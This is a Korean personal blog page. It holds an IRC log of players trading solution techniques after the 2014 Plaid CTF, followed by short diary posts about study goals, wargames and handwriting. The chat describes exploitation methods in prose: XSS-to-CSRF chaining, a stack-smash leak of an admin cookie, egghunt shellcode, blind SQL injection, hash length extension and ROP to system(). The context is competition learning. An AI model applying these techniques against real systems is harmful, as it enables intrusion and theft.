[02:09] <NK_> tylerni7 / cai_ well done, it was great
[02:09] <NK_> :)
[02:09] <inter> 2. buy ida
[02:09] <Adran> 1. seems like poor life choice
[02:10] <inter> well
[02:10] <chuckleberry> foundation: nice!
[02:10] <inter> some of the ppps
[02:10] <inter> ate overnight chinese food
[02:10] <inter> so i decided to do that as well
[02:10] <Adran> is that why we had a massive netsplit?!
[02:10] <inter> and as it turned out i like overnight pho better
[02:10] <Adran> the servers ate old Chinese food?
[02:10] == chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
[02:10] <robbje> want zfs writeup
[02:10] <phiber> dwn, custom dns server with twisted and ttl=0 FTW
[02:10] <jix> foundation: I gave up following this async spaghetti mess
[02:11] <dwn> phiber: how do you set that up
[02:11] <sven> "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
[02:11] <sven> robbje: ^--
[02:11] <Adran> phiber: what did you use that for?
[02:11] <jix> foundation: instead I patched the bandwidth + weight calculation
[02:11] <dwn> would like to see a writeup on that, lol, phiber
[02:11] <jix> foundation: to make chandler the #1 candidate for everything
[02:11] <phiber> Adran, whatscat
[02:11] == Gut_ [uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw] has quit [Quit: Connection closed for inactivity]
[02:11] <upb>  < dwn> how were we suppsoed to guess there was a flags table in whatscat ;_; <- haha, i gave up on that aswell, thought about reading out information_schema.tables but php munges  . in txt record value  for some reaosn
[02:11] <plaintext> who is in charge of the plaid twitter?
[02:11] <inter> cai_: when i ran into obstacles i listened to this
[02:11] <Adran> phiber: got a writeup?
[02:11] <_blasty_> ricky: tylerni7: mserrano: how much longer is bronies going to be up ?
[02:11] <inter> it magically calmed me down lul
[02:11] <_blasty_> I wanna refine some stuff in the AM
[02:11] == acez [~acez@129.10.117.100] has left #pctf []
[02:11] <_blasty_> not fucking now, though
[02:11] <+tylerni7> plaintext: most of us have control of it
[02:12] <deject3d> anyone have strategies on solving brony? i don't really understand how attacking the internal target was supposed to work
[02:12] <inter> brony?
[02:12] <_blasty_> deject3d: XSS
[02:12] <inter> i know 2nd part
[02:12] <inter> deals with shit ton of stuff
[02:12] <robbje> sven: xor. ...
[02:12] <deject3d> yeah but the xss wasn't the attack on the actual target
[02:12] <foundation> btw, about brony, what was the first part, i did get the PHPSESSIONID , what then ?
[02:12] <dwn> _blasty_: the fuck did you use xss to do though
[02:12] <deject3d> i want to know how we were supposed to use the xss to attack the internal panel
[02:12] <_blasty_> deject3d: so using the XSS in the ponies website you can execute a CSRF POST against the login form of the portal page
[02:13] <nurfed_> xss->csrf->expolt leak->xss->csrf->exploit->/bin/bash
[02:13] <_blasty_> if you feed the portal page more than N chars in the OTP field it will segfault
[02:13] <_blasty_> if you keep feeding it chars it will trigger the "stack smashing detected" message
[02:13] <_blasty_> the "stack smashing detected" message has the progname in it
[02:13] <foundation> ooooo....
[02:13] <foundation> niceeee
[02:13] <_blasty_> like STACK SMASHING DETECTED: ./checkotp terminated
[02:13] <deject3d> what is the point of the csrf? we could already see the 'internal' login page, right? or am i misinformed
[02:13] <dwn> _blasty_: what values did you post to the login form though?
[02:13] <_blasty_> but the pointer to that argv0 checkotp string could be overwritten
[02:13] <_blasty_> so get your own input in the output again
[02:14] <_blasty_> then you basically elevevate XSS privileges to that domain
[02:14] == albntomat0 [8c201003@gateway/web/freenode/ip.140.32.16.3] has quit [Quit: Page closed]
[02:14] <_blasty_> from where you can leak the admin cookie
[02:14] <_blasty_> we'll do a proper writeup
[02:14] <phiber> dwn, Adran  https://privatepaste.com/6413fc0aca
[02:14] <_blasty_> this explanation sucks
[02:14] <_blasty_> part#2 is even cooler
[02:14] <deject3d> would appreciate it
[02:14] <deject3d> i tried using beef framework to start some attacks against the internal site but owell
[02:14] <inter> well
[02:14] <dwn> wow, you actually wrote your own dns server phiber. amazing.
[02:15] <inter> now i can go do my kush
[02:15] <inter> happily
[02:15] <inter> lul
[02:15] <_blasty_> I also "wrote" my "own" DNS server for whatscat, using some perl module :-P
[02:15] <inter> now that i figured out the stuff that i couldnt do :D
[02:15] <_blasty_> Net::DNS::Server or something
[02:15] <_blasty_> yay perl.
[02:15] == Guest75992 [80edcf34@gateway/web/freenode/ip.128.237.207.52] has quit [Ping timeout: 240 seconds]
[02:15] <plaintext> we did whatscat with blind sqli
[02:15] <+tylerni7> dinner time for PPP
[02:15] <+tylerni7> we'll be back online laterz
[02:15] <_blasty_> we did whatscat by updating the email field in the DB
[02:16] == xire_ [~marco@adsl-ull-93-153.49-151.net24.it] has quit [Quit: Lost terminal]
[02:16] <plaintext> tylerni7, I sent you a message :)
[02:16] <Adran> phiber: ugh, inject was dns
[02:16] <dwn> how did you all do tenement?
[02:16] <_blasty_> then requesting the reset page again for that user to leak back the value we inserted into the email field
[02:16] <Adran> didn't think about that. thanks
[02:16] == mrsmith67 [uid11196@gateway/web/irccloud.com/x-wrpmyrgkuuglgdje] has quit [Quit: Connection closed for inactivity]
[02:16] <dwn> it was 100pts so it must've been incredibly easy
[02:16] <dwn> but the seccomp
[02:16] <foundation> dwn: no need for the shell, just egghunt for PPPP in memory
[02:16] <+pctf_scoreboard> o/
[02:17] == pctf_scoreboard [~pctf_watc@ec2-54-208-233-50.compute-1.amazonaws.com] has quit [Quit: WeeChat 0.3.8]
[02:17] == shabgrd [~mostafa@unaffiliated/shabgard] has quit [Ping timeout: 245 seconds]
[02:17] <Adran> the scoreboard is speaking!
[02:17] <dwn> was PPPP in a static location
[02:17] <foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
[02:17] <dwn> oh, neat
[02:17] <dwn> thanks will remember that
[02:17] <foundation> it was in some mmaped region , but we didn't know where
[02:18] <deject3d> was there a trick to solving polygonshifter web100
[02:18] <plaintext> just blind sqli
[02:18] <plaintext> nothing extra
[02:18] <foundation> afaik bsqli
[02:18] <deject3d> wait, it was a sqli
[02:18] <deject3d> oh god damnit
[02:18] <plaintext> i guess I will make quick a writeup on that too
[02:18] <Tapyroe__> !! -.-
[02:18] <pd7> plaintext: are your writeups online yet?
[02:19] <plaintext> pd7: i made one on halphow2js
[02:19] <Tapyroe__> sitting here thinking about all the problems i could've solved haha....
[02:19] <dwn> was there some neat way to evaluate all the templates in G++ for you
[02:19] <nurfed_> web100 was stupid :/
[02:19] <geobot> on web100 chicken
[02:19] <Tapyroe__> or rather, should've been able to solve haah
[02:19] <dwn> because we just worked G++ out on paper
[02:19] <D3AdCa7_> Is polygonshifter can be solved by union way?
[02:19] <plaintext> plaid retweeted it but I removed that tweet dammit, because there was a typo :P
[02:19] <deject3d> i took the problem description at face value and tried to actually brute force the login
[02:19] <plaintext> and now it's not retweeted, no fame :(
[02:19] <D3AdCa7_> My bsqli script runs so slow
[02:20] <foundation> dwn: apparentlly you needed to figure out that it's actually just doing matrix multiplication over galois field 257 ...
[02:20] <pcc7> a writeup for pyjail?.
[02:20] <deject3d> the html comment "admin / ???????" made me think it was actually a 7 char password. "polygon" and "shifter" are both 7 chars each, so i wrote a script to try every combination involving case
[02:20] <deject3d> WHAT A WASTE
[02:20] == Stean [~Stean@hlab.informatik.uni-mannheim.de] has joined #pctf
[02:21] <D3AdCa7_> u r so cute.. deject3d :)
[02:21] <plaintext> it wasn't misc 10 though :P
[02:21] <iZsh> how did you guys solve tenement? because it took me forever and some ppl solved it quickly, so i'm wondering if i missed an easier way
[02:21] <dwn> plaintext: link to your how2js writeup?
[02:22] <dwn> iZsh: 18:14 < foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
[02:22] <cimmi_> what was actually the answear to the math is hard?
[02:22] <mathiasbynens> plaintext: in your how2js writeup, “The keys cannot be in increasing order” → wut?
[02:22] <plaintext> mathiasbynens: is that a mistake?
[02:22] <plaintext> let me check
[02:22] <foundation> iZsh: took a while to figure out how not to segfault on invalid pages
[02:23] <plaintext> oh right, lol
[02:23] <plaintext> i'm dumb
[02:23] <D3AdCa7_> a script for web100 https://gist.github.com/D3AdCa7/10604720
[02:23] <foundation> cimmi_: 100000
[02:23] <plaintext> I'll add a clarification
[02:23] == Bono [1b7f597e@gateway/web/freenode/ip.27.127.89.126] has joined #pctf
[02:23] <mathiasbynens> plaintext: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme they’re sorted lexicographically
[02:23] <iZsh> dwn: what did you write? i'm not sure i follow, but i dont remember exactly the whole thing :)
[02:23] <mathiasbynens> but you knew that
[02:23] <foundation> cimmi_: google excel 65000 100000 for clarification
[02:23] <plaintext> yeah, brainfart
[02:23] <mathiasbynens> plaintext: i'll add a link to your write-up, let me know if you write more!
[02:23] == naehrwert [~naehrwert@84-72-164-134.dclient.hispeed.ch] has joined #pctf
[02:23] <plaintext> thanks :)
[02:23] <plaintext> I'll do one on polygon I guess
[02:24] <cimmi_> yea I actually did read it when I tried to find the answear
[02:24] <dwn> iZsh: tenement basically just executed your buffer but there was seccomp so you're not going to read the file or get shell. I wasn't able to get around this because I couldn't figure out how to find the flag in memory. foundation just dumped the whole memory.
[02:24] <skuu> plaintext: did you mention hudak? if so; remember the flag so I can check where I went wrong?
[02:24] <iZsh> dwn: we solved it completely differently, we called malloc(16) and had some smart filtering to recognize the proper pointers to follow
[02:24] <cimmi_> I submitted 10k and not 100k when looking at that one. stupid
[02:24] <|x_x|http://csrc.tamuc.edu/css/?p=156 Lazy man's doge_stege writeup
[02:24] <foundation> iZsh: we just wrote egghunt shellcode that traversed the memory , the trick was to see which addresses were actually mapped , using write() you can check if the address is valid or not
[02:24] <plaintext> i think I have the hudak flag
[02:25] <iZsh> foundation: oh i see
[02:25] <plaintext> skuu: 4t_l34st_it_was_1mperat1v3...
[02:25] <skuu> oh wow, thanks
[02:25] <iZsh> well, we did it the complicated way ;-)
[02:25] <|x_x|http://csrc.tamuc.edu/css/?p=152 Sanity Check, Heartbleed, and Multiplication is Hard as well. ya know, in case ya had problems with Sanity Check.
[02:25] <skuu> soo close
[02:25] <abuss> cimmi_, ouch; why wouldn't you just submit 100000? :P
[02:25] == zzoru [6e23254c@gateway/web/freenode/ip.110.35.37.76] has quit [Ping timeout: 240 seconds]
[02:25] <abuss> sanity check was a really hard web problem
[02:25] == zzoru [6e23254b@gateway/web/freenode/ip.110.35.37.75] has joined #pctf
[02:25] <iZsh> foundation, dwn : So libjansson has a reference-count based object system, and when a successful address has been found from the json array, it free()'s both the json integer object and the json array containing the same integer, so when dumping all the free()'d objects (by malloc'ing 16 bytes and dumping the contents), you'll see the reference count of 0 for a lot of objects, and reference count -1 for the chosen address.
[02:25] <iZsh> Then &0xfffff000 it and dump the buffer, and you get the flag;
[02:26] == deject3d [~deject3d@205.204.16.136] has quit [Quit: Computer has gone to sleep.]
[02:26] <abuss> <f5><f5><f5><f5><f5> ooh a flag - submit? no it timed out <f5> <f5> <f5> <f5> <f5>
[02:26] <cimmi_> abuss: who knows? atleast not me
[02:26] <abuss> "Logged in as Samurai, abort!"
[02:26] <dwn> nice iZsh
[02:26] <iZsh> the write() trick is nice :)
[02:26] <iZsh> much easier
[02:26] <spq> admins: what was wrong with the scoreboard being unreachable from some places in the first hours?
[02:26] <iZsh> i spent hours and hours no tenement
[02:26] <dwn> yeah for only 100pts
[02:27] <dwn> ;_;
[02:27] <iZsh> i wonder how we were supposed to solve it
[02:27] <iZsh> if they expected 100pt
[02:27] <geobot> only 100pt for a bit, or a school/work day - in pm about rarverseme?
[02:27] <iZsh> tylerni7: what was the expected way?
[02:27] <mathiasbynens> iZsh: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/tenement#readme dump the whole memory then run strings
[02:28] == Mawekl [~chatzilla@aajb235.neoplus.adsl.tpnet.pl] has quit [Quit: lulu]
[02:28] == irctc035 [4406454f@gateway/web/freenode/ip.68.6.69.79] has joined #pctf
[02:28] <dwn> all these todo writeups mathiasbynens, lol
[02:28] <iZsh> mathiasbynens: lol
[02:28] <iZsh> mathiasbynens: that could be summarized as "get the flag"
[02:29] <mathiasbynens> dwn: yeah the point is for people to help ;)
[02:29] <mathiasbynens> iZsh: inorite
[02:29] == DeAdCaT___ [~D3AdCa7@123.157.213.227] has joined #pctf
[02:29] == DeAdCaT___ [~D3AdCa7@123.157.213.227] has quit [Client Quit]
[02:30] == D3AdCa7_ [d220a27e@gateway/web/freenode/ip.210.32.162.126] has quit [Quit: Page closed]
[02:30] == inter [~inter@d99-199-6-217.bchsia.telus.net] has quit [Quit:  HydraIRC -> http://www.hydrairc.com <- Would you like to know more?]
[02:31] == irctc035 [4406454f@gateway/web/freenode/ip.68.6.69.79] has quit [Client Quit]
[02:31] <dwn> this hash length extension thing is the most obscure web thing ever. i love it
[02:33] <dwn> ppp: will the challenge sources be released? or some way for us to run them ourselves to try to complete them?
[02:33] <iZsh> well hash length extension is a classic
[02:33] <dwn> is it? I've been ctfing for about a year and don't remember seeing it
[02:33] == handlr [~handlr@unaffiliated/handlr] has joined #pctf
[02:33] <iZsh> it's not the first time i see one, but can't recall where
[02:33] == nonroot [~nonroot@c-50-171-174-145.hsd1.mn.comcast.net] has quit [Ping timeout: 276 seconds]
[02:34] == sweet_potatoes [~sweet_pot@113.162.145.1] has quit [Ping timeout: 252 seconds]
[02:34] <upb> yeah but how the hell was it supposed to be guessed that the serialized string is reversed before hashing?
[02:34] <iZsh> anyway, i'm off
[02:34] <phiber> upb, get admin.php source
[02:35] <|x_x|> Which could be obtained by feeding admin.php through the ?page= variable.
[02:35] == ijonas [534e453a@gateway/web/freenode/ip.83.78.69.58] has quit [Quit: Page closed]
[02:35] == nonconstant [c1e17dfd@gateway/web/freenode/ip.193.225.125.253] has quit [Quit: Page closed]
[02:36] <Digihash> Goodbye, thank you guys for the great CTF
[02:36] <dwn> upb: you could get the source
[02:36] <grollicus_> did you ever sql inject via dns records? that challenge was especially funny because there seems to be some vuln in the management software of the first domain we tried to use
[02:36] == corpille [~corpille@mnh44-1-82-228-152-110.fbx.proxad.net] has quit [Quit: Lost terminal]
[02:37] == c1l0 [~c1l0@c-98-248-187-55.hsd1.ca.comcast.net] has quit [Ping timeout: 245 seconds]
[02:37] <dwn> grollicus_: I actually encountered the same thing
[02:37] <upb> HAH
[02:37] <dwn> reported it
[02:37] <phiber> I could have solved parlor in time if python/pypy wasn't so slow
[02:37] <poppopret> my mtgox web 150 writeup
[02:37] <spq> how did you solve harry potter?
[02:37] <phiber> tylerni7, you could have given more bits of the md5 :/
[02:38] <sven> or you could've written your brute forcer in c :P
[02:38] <chuckleberry> huh, of all of the challenges most people think mtgox needed a writeup?
[02:38] <phiber> I didn't have enough time for that
[02:38] <phiber> there were like 10min left when I had the attack implemented
[02:39] <chuckleberry> life's hard
[02:39] == Digihash [~Digihash@dD576DCCA.access.telenet.be] has quit [Quit: Leaving]
[02:39] <sven> we ran out of time to solve moscow too - it happens :)
[02:39] <foundation>  4st  _l34t t1mpera _wa _it_ at_ as_1v3...   << damn , so close
[02:39] <chuckleberry> poppopret: i didn't even get a mention!
[02:40] <chuckleberry> bad form
[02:40] <poppopret> huh?
[02:40] <chuckleberry> remember, you pmd me
[02:40] <spq> regarding harry potter: i really had problems finding gadgets, made it with very weird add [rbx-something], cl; cl was horrible to control - when i had that, i patched one got entry to point to system and the did a dereferencing call to that entry
[02:40] <chuckleberry> asked me for help...
[02:40] <poppopret> ok how would you like to be credited :)
[02:40] <foundation> spq: same here afaik
[02:40] <chuckleberry> i was joking
[02:40] == copyleft_ [~copyleft@209.222.15.233] has quit [Ping timeout: 258 seconds]
[02:41] <poppopret> hahah ok
[02:41] <spq> foundation: how did you control cl? the add cl, cl + dec cl ?
[02:42] <naehrwert> spq, writing byte by byte using mov [rax], bl @ 401798
[02:42] == Redford [~Redford@178-36-51-105.adsl.inetia.pl] has quit [Ping timeout: 245 seconds]
[02:42] <spq> naehrwert: well i had writing byte by byte working but didnt know what to do
[02:43] <skuu> spq: foundation: we didn't use system(), we used vsyscalls execve
[02:43] <plaintext> how did you guys solve sass btw?
[02:43] <plaintext> we thought about jumping to read to cause one more buffer overflow, but it was too late
[02:43] <_blasty_> hey naehrwert , you were also playing ?
[02:43] <spq> skuu: which vsyscalls?
[02:43] <spq> the stuff in 0xfffff... ?
[02:43] <skuu> yep
[02:43] <spq> damn
[02:43] <naehrwert> hi _blasty_ :) yup with skuu and foundation and some other nice guys
[02:43] <_blasty_> cool :)
[02:43] <_blasty_> what team? Binary bandits?
[02:44] <naehrwert> gn00bz
[02:44] <_blasty_> ah, right
[02:44] <spq> tried that, didnt work on my machine, detected unaligned jump into the page
[02:44] <skuu> yup, ubunutu and what not catches it
[02:44] == KTlog [~KTlog@catv-80-98-251-10.catv.broadband.hu] has joined #pctf
[02:44] <skuu> but works on debian :D
[02:44] <spq> damn
[02:44] <skuu> 3.2 kernel ish
[02:44] <spq> that would have meant 1-2hrs less :)
[02:45] == KT__ [~KT@catv-80-98-251-10.catv.broadband.hu] has joined #pctf
[02:45] <spq> but was interesting how one can control a register with such obscure gadgets :)
[02:46] == KTlog_ [~KTlog@catv-80-98-251-10.catv.broadband.hu] has quit [Ping timeout: 252 seconds]
[02:46] == KT [~KT@catv-80-98-251-10.catv.broadband.hu] has quit [Ping timeout: 252 seconds]
[02:46] == sweet_potatoes [~sweet_pot@113.162.145.1] has joined #pctf
[02:47] <plaintext> anyone who solved sass?
[02:48] == batzig [~textual@75-25-137-24.lightspeed.plalca.sbcglobal.net] has joined #pctf
[02:48] == chunderstruck [~phoenix@184-98-244-58.phnx.qwest.net] has joined #pctf
[02:48] <naehrwert> so for parlor, is that '+' meant as concat. or addition?
[02:49] <phiber> haha
[02:49] <Galactic> dwn: RuCTF had a hash length extension attack.
[02:49] <naehrwert> I tried like every possible combo but could never reproduce server output -.-
[02:50] <phiber> I also got stuck there and had to ask about it
[02:50] == braoru [~braoru@77-58-136-48.dclient.hispeed.ch] has quit [Quit: braoru]
[02:50] <sven> int(md5(servernonce.decode("hex") + clientnonce + "\n").hexdigest(), 0x10)
[02:50] <alexwebr> Read all the scrollback, didn't see TL;DR for freya. Looked like MS-KKDPC, said FTS after reading krb5 ASN.1 from RFC. Anybody get it?
[02:50] <sven> i got it
[02:50] <sven> it was annoying as fuck :)
[02:50] <naehrwert> I'm pretty sure that was one way I tried it too, hmm :D
[02:51] <sven> alexwebr: you need to grab the http branch from https://github.com/nalind/krb5/compare/http
[02:51] <sven> and then change around /etc/krb5.conf until you can finally kinit ppp and then ssh ppp@shell.woo.pctf
[02:52] <alexwebr> sven: cool, and "shellpls" was actually the password?
[02:52] <sven> for the kerberos login, yeah
[02:52] <sven> (the kinit ppp part)
[02:52] == Bono [1b7f597e@gateway/web/freenode/ip.27.127.89.126] has quit [Quit: Page closed]
[02:53] <alexwebr> sven: Cool. I was expecting I'd have to write a proxy thing myself. Cool that there's code already. Thanks :-)
[02:53] <sven> yeah, i started writing my own proxy when i googled for some magic constant and found that git :-)
[02:54] == Kasalehlia [~kasalehli@shakik.de] has left #pctf ["(V) ( ;,,,; ) (V) Why not Zoidberg?"]
[02:54] <sven> when i saw frozencemetery was the author of that patch i knew i was looking in the right direction ;)
[02:54] <alexwebr> Haha
[02:54] <sven> and then i failed for 3 hours because ssh was linked against some wrong version of the library \o/
[02:57] == d248 [~darwin@vault.isis.poly.edu] has left #pctf []
[02:57] <|x_x|http://csrc.tamuc.edu/css/?p=169 Twenty Writeup
[03:02] == 64MAAAC71 has changed nick to kaliman
[03:03] == jablonskim [~jablonski@178235254045.warszawa.vectranet.pl] has quit [Quit:  HydraIRC -> http://www.hydrairc.com <- Po-ta-to, boil em, mash em, stick em in a stew.]
[03:03] == chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has quit [Remote host closed the connection]
[03:03] <cimmi_> any parlor writeups?
[03:03] == ZadYree [~Zad@79.146.119.80.rev.sfr.net] has quit [Ping timeout: 245 seconds]
[03:04] == deject3d [~deject3d@205.204.16.136] has joined #pctf
[03:05] == jmgrosen [~jmgrosen@ip68-227-85-44.sb.sd.cox.net] has quit [Quit: jmgrosen]
[03:06] == DeadheadTn [~xtr4@41.226.164.163] has quit [Quit: Leaving]
[03:08] <plaintext> i guess everyone is sleeping right now
[03:08] == DuM [~bt@50-88-124-149.res.bhn.net] has quit [Ping timeout: 252 seconds]
[03:09] <|x_x|> Sleeping or realizing they just spent a weekend eating cold pizza and hacking instead of doing Calculus III homework that is due tomorrow.
[03:09] <plaintext> lol I do have an assignment due tomorrow
[03:09] <plaintext> crap
[03:10] <rray> assignment + essay ;_;
[03:12] <tokki> fak i wanted to log the whole channel
[03:12] <tokki> but this webirc killed it
[03:13] == batzig [~textual@75-25-137-24.lightspeed.plalca.sbcglobal.net] has quit [Quit: My MacBook Pro has gone to sleep. ZZZzzz…]
[03:13] <tokki> any angel who wants to past it on pastebin <3
[03:13] <deject3d> i get to learn haskell tonight, yay procrastination
[03:13] <plaintext> deject3d: did you solve hudak?
[03:14] <chuckleberry> i need to learn why i'm so fucking bad at ctfs and how to fix that
[03:14] <deject3d> no, but i just went through my professors slides and literally saw the hudak name
[03:14] <deject3d> and was like "oh must have been a haskell challenge"
[03:14] <plaintext> well it was, kinda, sorta
[03:14] == chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf

[03:15] <dwn> |x_x|: due tomorrow? wow, how nice. mine is midnight tonight ;_;
[03:15] <plaintext> dwn: what timezone?
[03:15] <Adran> tokki: sure
[03:15] == poppopret [~poppopret@c-67-169-180-57.hsd1.ca.comcast.net] has quit [Ping timeout: 258 seconds]
[03:15] <dwn> plaintext: EST
[03:16] <|x_x|> dwn: Mine is due at noon tomorrow.
[03:16] <dwn> just need to pwn this submission server and i'll be set
[03:16] == nonroot [~nonroot@c-66-41-75-46.hsd1.mn.comcast.net] has joined #pctf
[03:17] == asmoday [~asmoday@pool-71-243-237-218.tampfl.fios.verizon.net] has quit [Quit: Rage Quit]
[03:18] <|x_x|> tokki: http://paste2.org/IIcALYLX
[03:19] <plaintext> damn, CTFs are unhealthy
[03:20] <Adran> tokki: http://pastebin.com/tpeyNqJH
[03:20] <plaintext> 48 hours of sitting, barely eating and sleeping
[03:20] <Adran> looks like |x_x| beat me to it
[03:20] <Xor0X> totally worth it though
[03:20] <plaintext> yep
[03:20] == azet [~azet@tartaros.azet.org] has joined #pctf
[03:20] <azet> ohai
[03:20] == orto [~orto@fileville.net] has left #pctf []
[03:20] <azet> any writeups online yet? (rsa, parlor, wheee)?
[03:22] <|x_x|> I may not have ranked in the top 10 spots, but at least I made it in the top 14%. That's close enough. >_>


반응형

'KOREAN > 뻘글' 카테고리의 다른 글

블로그 모양새  (0) 2014.06.29
이번달에 할 것  (2) 2014.06.09
제 프로필 사진 어떤가요  (0) 2014.03.05
[3월목표] 잡다  (0) 2014.02.24
LeaveRet Wiki  (0) 2014.02.13
반응형

저거 한번쓰려고 종이에다가 한가득 제 닉네임을 (오글거리는것을 참고서) 쓴 다음에 골랐어요..

예쁘죠 예쁘죠


초딩때부터 영어나 한글이나 글씨 예쁘게 못쓰는게 엄청 트라우마였는데 중학생이 되고 나니 점점 좋아지더라고요.

그러니 초등학생 여러분, 예쁘게 쓴다고 굳이 자음을 그렇게 크게 쓰지 않아도 되요ㅋㅋ 날려쓰지 않아도 되고

편한대로 쓰세요 :) 초등학교 공책보면 이게 외계어인지 한글인지 세종대왕님 죄송합니다 사랑합니다 옛날부터 열심히 써도 안나아지던 손글씨가 그냥 나아지더라고요

막 초딩때는 샤프쓰면 버릇나빠진다고 못쓰게 했는데 그래도 3~4학년부턴 써도 되는거같구여

중학생정도 되면 손에 힘이 생겨서인지 아니면 뭐 더 많이 써서 그런지 손글씨 교정이 다 되요ㅋㅋㅋㅋㅋ

저도 쓰면서 신기함..

한 중2 중반부터 나아지더니 그당시 여름에 다닌 영어학원때문인가 에세이를 많이 써서 그런가  이제는 진짜 대충써도 읽을만큼은 되요. 졸때는 예외...


암튼 그렇다고 합니다

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

이번달에 할 것  (2) 2014.06.09
pCTF2014 irc log  (2) 2014.04.13
[3월목표] 잡다  (0) 2014.02.24
LeaveRet Wiki  (0) 2014.02.13
[1,2월목표] dovelet  (0) 2014.01.10
반응형

우선 이달은 부모님 생신. 생일선물을 위해 저축좀해야겠다


이달 내내 더블릿 10문제 푸는것을 목표로 합니다.

3월 14일쯤까진(그게 무슨날이죠? 뭐라고요? 잘 안들리네요) 지금 방법을 아는데도 성공시키지 못하는 lob문제를 풀고 rtl기법으로 밀고나갈..생각입니다. 디버깅 실력도 늘려야되는데!!!!!!!!!


요즘은 영어든 한글이든 난독증이 오는것같은데(아마 언어구상능력이 떨어지고 있다는 증거겠죠..), 그나마 한글이 나은데, 한글마저 어려우니까 이해가 힘든데 여러번 읽으면 점차 이해되겠죠? 하하..


..음 그래서 궁극적인 목표는 학교를 한달동안 별 탈없이 버티는것입니다...

 +)롤은 끊었어요 헤헤 어차피 못해서 늘 욕만먹다보니 별로 할마음도 없어지게되더라구여 가끔씩 들어가서 해야지



[후기]

..아.

이제와서 확인해보니 하나도 안함

나니??? 블로그에 글 왜적은겨???

lob는 풀고 문서도 좀 읽었는데 더블릿은 안풀었네여

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

pCTF2014 irc log  (2) 2014.04.13
제 프로필 사진 어떤가요  (0) 2014.03.05
LeaveRet Wiki  (0) 2014.02.13
[1,2월목표] dovelet  (0) 2014.01.10
심볼릭 링크에 \x2f안들어가지잖아요  (0) 2014.01.07
반응형

http://anch0vy.tk/wiki/index.php


ㅋㅋㅋㅋ개성있다

재미있으니 한번 들르고가세요ㅋㅋ

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

제 프로필 사진 어떤가요  (0) 2014.03.05
[3월목표] 잡다  (0) 2014.02.24
[1,2월목표] dovelet  (0) 2014.01.10
심볼릭 링크에 \x2f안들어가지잖아요  (0) 2014.01.07
2014년!  (0) 2014.01.04
반응형

제가 게으름을 엄청부립니다.

오늘 그런거에 대한 포스팅을 읽었는데요, (링크는 나중에 찾아서 올릴께요) 제가 거기의 게으름뱅이에 너무 해당하는것 같아서.. 오늘부터 바뀌어보겠습니다. 원래 제가 귀차니즘이 많아서 일도 되게 미루고 (예를 들면 학교숙제는 11시쯤에 시작한다던가) 그런데 그때까지 아무것도 안해요. 한 5시간동안 컴앞에 앉아서 진짜 아무것도 안해요. 결과물이 없는데 그동안 뭘했는지도 모르겠고.. 컴퓨터(소셜네트워크)중독인것 같아요.


저는 늘 목표를 너무 크게잡아서(작게잡아도 못지키고) 자책도 하고 이루지도 못하고 자신감도 없어지고 슬럼프도 걸려서 천천히 하려고여. 이게 쉽게 고쳐질지는 모르겟지만.... 그래도 안하는것보단 시도하는게 낫죠.


우선 첫번째 목표는 2월 중순까지 lob, 지금 하고 있는 vampire->skeleton을 끝내려고합니다.(한.. 발렌타인 데이까지?ㅠ) 이게 원래 그렇게 오래걸리는 단계가 아니라는데 지금 꽤 오래잡고있기도 했고.. 어렵네요..ㅋ...

그리고 두번째는 2월말까지 더블릿문제들을 50문제(이상) 풀으려고 합니다. 이건 좀 높은 목표인것같은데, 지금 2년동안 대충해서 29문제를 풀었는데 열심히 하면 50문제까지 풀 수 있을 것 같아요. 


이 목표 다 이룰때까진 롤은 안하려구요 (제가 롤을 못하는것도있고ㅋㅋㅋ 점멸이 얼마 안남았긴 한데..)

으으.. 꼭지켜야지



----[후기(?)]-------------------------------------------------------------------------------------------

2014.02.23

더블릿 50문제는 겨우겨우 다 풀었습니다. 다음달엔 10개 더 풀 예정입니다. 

적어보이긴 하지만 그 이상 해놓으면 이게 난이도가 갑자기 막 올라가서 어려울 것 같고, (제가 특별히 수학이나 뭐 이런걸 잘하는것도 아니고요) 지금 학교를 옮긴 상태인데 학교가 너무 안맞아서 정신적으로나 시간적으로나 너무 힘듭니다.. 지금 정신적으로 매우 후달리고있어요..


lob는 어떻게 해야할지 모르겠네요. 현 단계는 어떻게 해야하는진 아는데 잘 안되고.. 이게 실력&경험이 있음과 없음의 차이입니다.. 방법을 들엇는데도, 어떻게 되는지도 아는데도 공격실행을 못시키다니 으헝헝ㅠㅠ

암튼 그래서 이건 잠시 뒷편에 넣어두고 6월까지 rop 꼭 이해해서 성공시킬껍니다 꼭이요

지금은 rtl하고 있는데 이것도 방법은 알겠는데 성공이 안되네요 크흡 이걸로 아마 lob 몇몇단계 풀 수 있을테니 이걸로 밀고나갈껍니다. 한동안은. 가상머신을 사용할 수 있는동안은.

근데 브엠 배터리 엄청먹네요 학교에선 사용하기 너무힘들어요 배터리 파괴신


근데 진짜 시간이 너무 없어요.. 망할학교.. 프로젝트에다가 시험을 마구 던져주네요. 이런 악마같은 선생들이.. 게다가 점수도 잘주는것도 아니고.. 너무 힘들어요ㅠㅠㅠㅠㅠㅠ

넴 뻘글 봐주셔서 감사합니다

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

[3월목표] 잡다  (0) 2014.02.24
LeaveRet Wiki  (0) 2014.02.13
심볼릭 링크에 \x2f안들어가지잖아요  (0) 2014.01.07
2014년!  (0) 2014.01.04
xcz.kr 풀이를 다 옮겨왔다!  (0) 2013.11.28
반응형

그게 슬래쉬로 인식되서 그런다는데 

그러면 그냥 디렉토리를 만들으래요.

졸천재인듯

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

LeaveRet Wiki  (0) 2014.02.13
[1,2월목표] dovelet  (0) 2014.01.10
2014년!  (0) 2014.01.04
xcz.kr 풀이를 다 옮겨왔다!  (0) 2013.11.28
추억의 예능프로그램들..  (0) 2013.11.27

+ Recent posts